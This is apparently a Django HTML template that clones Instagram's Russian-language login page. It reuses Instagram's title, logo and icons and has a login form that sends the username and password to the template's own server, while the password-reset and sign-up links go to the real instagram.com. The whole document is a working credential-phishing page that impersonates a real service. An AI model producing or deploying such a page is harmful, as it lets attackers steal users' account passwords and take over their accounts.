{% load static %}
<!DOCTYPE html>
<html lang="ru" class="js not-logged-in client-root js-focus-visible sDN5V" style="--desktop-nav-height:60px;">
  <head>
    <title>Instagram</title>  
    <meta name="apple-mobile-web-app-status-bar-style" content="default">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="theme-color" content="#ffffff">
    <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover">
    <link rel="preload" href="{% static 'mainsite/Instagram_files/9a93ba50dadf.css' %}" as="style" type="text/css" crossorigin="anonymous">
    <link rel="preload" href="{% static 'mainsite/Instagram_files/dfb83c4afa7c.css'%}" as="style" type="text/css" crossorigin="anonymous">
    <link rel="prefetch" as="stylesheet" href="{% static 'mainsite/Instagram_files/70d9ef5b60a1.css'%}" type="text/css" crossorigin="anonymous">
    <link rel="apple-touch-icon-precomposed" sizes="76x76" href="https://www.instagram.com/static/images/ico/apple-touch-icon-76x76-precomposed.png/666282be8229.png">
    <link rel="apple-touch-icon-precomposed" sizes="120x120" href="https://www.instagram.com/static/images/ico/apple-touch-icon-120x120-precomposed.png/8a5bd3f267b1.png">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="https://www.instagram.com/static/images/ico/apple-touch-icon-152x152-precomposed.png/68193576ffc5.png">
    <link rel="apple-touch-icon-precomposed" sizes="167x167" href="https://www.instagram.com/static/images/ico/apple-touch-icon-167x167-precomposed.png/4985e31c9100.png">
    <link rel="apple-touch-icon-precomposed" sizes="180x180" href="https://www.instagram.com/static/images/ico/apple-touch-icon-180x180-precomposed.png/c06fdb2357bd.png">
    <link rel="icon" sizes="192x192" href="https://www.instagram.com/static/images/ico/favicon-192.png/68d99ba29cc8.png">
    <link rel="shortcut icon" type="image/x-icon" href="https://www.instagram.com/static/images/ico/favicon.ico/36b3ee2d91ed.ico">
                
        


<link href="{% static 'mainsite/Instagram_files/dfb83c4afa7c.css'%} " type="text/css" crossorigin="anonymous" rel="stylesheet">



</head>
<body class="" style="">
        
<div id="react-root">
  <div style="width: 100%; height: 100%;">
    <div style="width: 100%; height: 100%;">
      <section class="_9eogI E3X2T">
        <div>

        </div>
        <main class="SCxLW  o64aR " role="main">
          <article class="_4_yKc">
            <div class="yOZjD _80tAB">
              <div class="V64Sp">
                <img alt="" class="RP4i1" src="{% static 'mainsite/Instagram_files/9144d6673849.jpg'%} ">
                <img alt="" class="RP4i1" src="{% static 'mainsite/Instagram_files/177140221987.jpg'%} ">
                <img alt="" class="RP4i1  UVauz" src="{% static 'mainsite/Instagram_files/ff2c097a681e.jpg'%} ">
                <img alt="" class="RP4i1 JtrJi " src="{% static 'mainsite/Instagram_files/b27a108592d8.jpg'%} ">
                <img alt="" class="RP4i1  " src="{% static 'mainsite/Instagram_files/5e04169b9308.jpg'%} ">
              </div>
            </div>
            <div class="rgFsT   ">
              <div class="gr27e  ">
                <img class="NXVPg Szr5J  coreSpriteLoggedOutWordmark  " src="{% static 'mainsite/images/logo.png' %}"></img>
                <div class="EPjEi">

                  <form class="HmktE" id="loginForm" method="post">
                    {% csrf_token %}
                    <div class="qF0y9 Igw0E IwRSH eGOV_ _4EzTm kEKum">
                      <div class="-MzZI">
                        {% comment %} <div class="_9GP1n   "> {% endcomment %}
                        {% comment %} <label class="f0n8F "> {% endcomment %}
                          {% comment %} <span class="_9nyy2">Телефон, имя пользователя или эл. адрес</span> {% endcomment %}
                      <label>Login: </label>
                          {{ form.login }}
                          {% comment %} <input aria-label="Телефон, имя пользователя или эл. адрес" aria-required="true" autocapitalize="off" autocorrect="off" maxlength="75" for="login" type="text" class="_2hvTZ pexuQ zyHYP" value="">{{ form.login }} {% endcomment %}
                        {% comment %} </label> {% endcomment %}
                        {% comment %} <div class="i24fI">
                        </div> {% endcomment %}
                      {% comment %} </div> {% endcomment %}
                    </div>
                    <div class="-MzZI">
                      {% comment %} <div class="_9GP1n   "> {% endcomment %}
                        {% comment %} <label class="f0n8F "> {% endcomment %}
                          {% comment %} <span class="_9nyy2">Пароль</span> {% endcomment %}
                          {% comment %} <input aria-label="Пароль" aria-required="true" autocapitalize="off" autocorrect="off" name="password" type="password" class="_2hvTZ pexuQ zyHYP" value=""> {% endcomment %}
                        {% comment %} </label> {% endcomment %}
                        <label>Password: </label>
                        {{ form.password }}
                        <div class="i24fI">
                        </div>
                      {% comment %} </div> {% endcomment %}
                    </div>

                    <div class="qF0y9 Igw0E IwRSH eGOV_ _4EzTm bkEs3 CovQj jKUp7 DhRcB">
                      <button class="sqdOP  L3NKy   y3zKF" type="submit">
                        <div class="qF0y9 Igw0E IwRSH eGOV_ _4EzTm">Войти</div>
                      </button>
                    </div>
                    <div class="K-1uj Z7p_S">
                      <div class="s311c">
                      </div>
                      <div class="_0tv-g">или</div>
                      <div class="s311c">
                      </div>
                    </div>
                    <div class="             qF0y9          Igw0E     IwRSH      eGOV_         _4EzTm    bkEs3                          CovQj                  jKUp7          DhRcB                                                    ">
                      <button class="sqdOP yWX7d    y3zKF     " type="button">
                        <span class=" coreSpriteFacebookIcon AeB99"></span>
                      </button>
                    </div>
                  </div>
                  <a class="_2Lks6" href="https://www.instagram.com/accounts/password/reset/" tabindex="0">Забыли пароль?</a>
                </form>
              </div>
            </div>
            <div class="gr27e">
              <div class="_7UhW9   xLCgt      MMzan   _0PwGv         uL8Hv         ">
                <p class="izU2O ">У вас ещё нет аккаунта? <a data-testid="sign-up-link" href="https://www.instagram.com/accounts/emailsignup/" tabindex="0">
                  <span class="_7UhW9   xLCgt       qyrsm      gtFbE      se6yk        ">Зарегистрироваться</span>
                </a>
              </p>
            </div>
          </div>
          {% comment %} <div class="APQi1">
            <p class="b_nGN">Установите приложение.</p>
            <div class="iNy2T">
              <a class="z1VUo" href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;ct=igweb.loginPage.badge&amp;mt=8&amp;vt=lo" tabindex="0"><img alt="Доступно в Магазине приложений" class="Rt8TI " src="{% static 'mainsite/Instagram_files/bfba6d0fd6bd.png'%} ">
              </a>
              <a class="z1VUo" href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3DBF2B4DAA-BD11-4C11-9511-7FE0E89AABE1%26utm_content%3Dlo%26utm_medium%3Dbadge" tabindex="0">
                <img alt="Доступно в Google Play" class="Rt8TI " src="{% static 'mainsite/Instagram_files/4c70948c09f3.png'%} ">
              </a>
            </div>
          </div> {% endcomment %}
        </div>
      </article>
    </main>
  </section>
</div>
</div>
</div>
<link rel="stylesheet" href="{% static 'mainsite/Instagram_files/9a93ba50dadf.css'%} " type="text/css" crossorigin="anonymous">
<link rel="stylesheet" href="{% static 'mainsite/Instagram_files/dfb83c4afa7c.css'%} " type="text/css" crossorigin="anonymous">

<div class="_-rjm">
  <div class="tA2fc ">
  </div>
</div>
<div class="_5qKD1">
  <div class="q5edG ">
  </div>
</div>
<div id="fb-root" class=" fb_reset">
  <div style="position: absolute; top: -10000px; width: 0px; height: 0px;">
    <div>
    </div>
  </div>
</div>
</body>
</html>